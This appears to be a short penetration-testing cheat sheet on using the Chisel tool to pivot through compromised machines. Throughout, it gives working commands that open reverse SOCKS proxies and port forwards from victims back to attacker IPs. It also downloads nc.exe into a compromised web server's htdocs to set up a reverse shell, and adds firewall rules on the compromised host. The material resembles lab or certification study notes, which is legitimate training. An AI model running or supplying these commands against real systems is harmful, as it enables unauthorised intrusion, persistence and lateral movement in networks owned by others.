Chisel

Chisel works in a client server way so the chisel binary needs to be on both the attacking machine and the compromised server.

Reverse Shell over SSH tunnel

Set up SSH tunnel and chisel server on your machine

chisel server -p 1335 --reverse &

Set up chisel client on compromised webserver

./chisel client 10.10.14.10:1335 R:9999:socks &

Start-Job {.\chisel.exe client 192.168.45.237:1335 R:9999:socks}
Start /B chisel.exe client 192.168.45.233:8080 R:9999:socks &

• Connecting to chisel server (10.10.14.10) on port 1335

• Anything coming into port 9999 put it out chisel server port 9999

Set up python server on port 9999 and download reverse shell from other machine

curl http://172.16.1.100:9999/nc.exe -o C:\xampp\htdocs\nc.exe'

Repeat port forward but on nc listening port

./chisel client 10.10.14.10:1335 1337:127.0.0.1:1337 &

Reverse SOCKS Proxy

First we need to set up the chisel server on our attacking machine

chisel server -p 1335 --reverse &

Next set up the client on the compromised server

./chisel client 10.50.102.164:1335 R:socks &

• R:socks

  • R means remotes. This tells chisel that the server is waiting for a proxy or port forward to be made

The connection will be made on port 1335 but the actual proxy is opened on port 1080. So we will be using 1080 to send traffic through the proxy.

Local Port Forward

A remote port forward is when we connect back from a compromised target to create the forward.

Start the chisel server on the compromised host (you will also have to open up the firewall port)

./chisel_windows.exe server --port 54321 --reverse --socks5

netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997

OR

firewall-cmd --zone=public --add-port 15997/tcp

Connect to the chisel server

chisel client 192.168.194.95:54321 127.0.0.1:9999:127.0.0.1:3306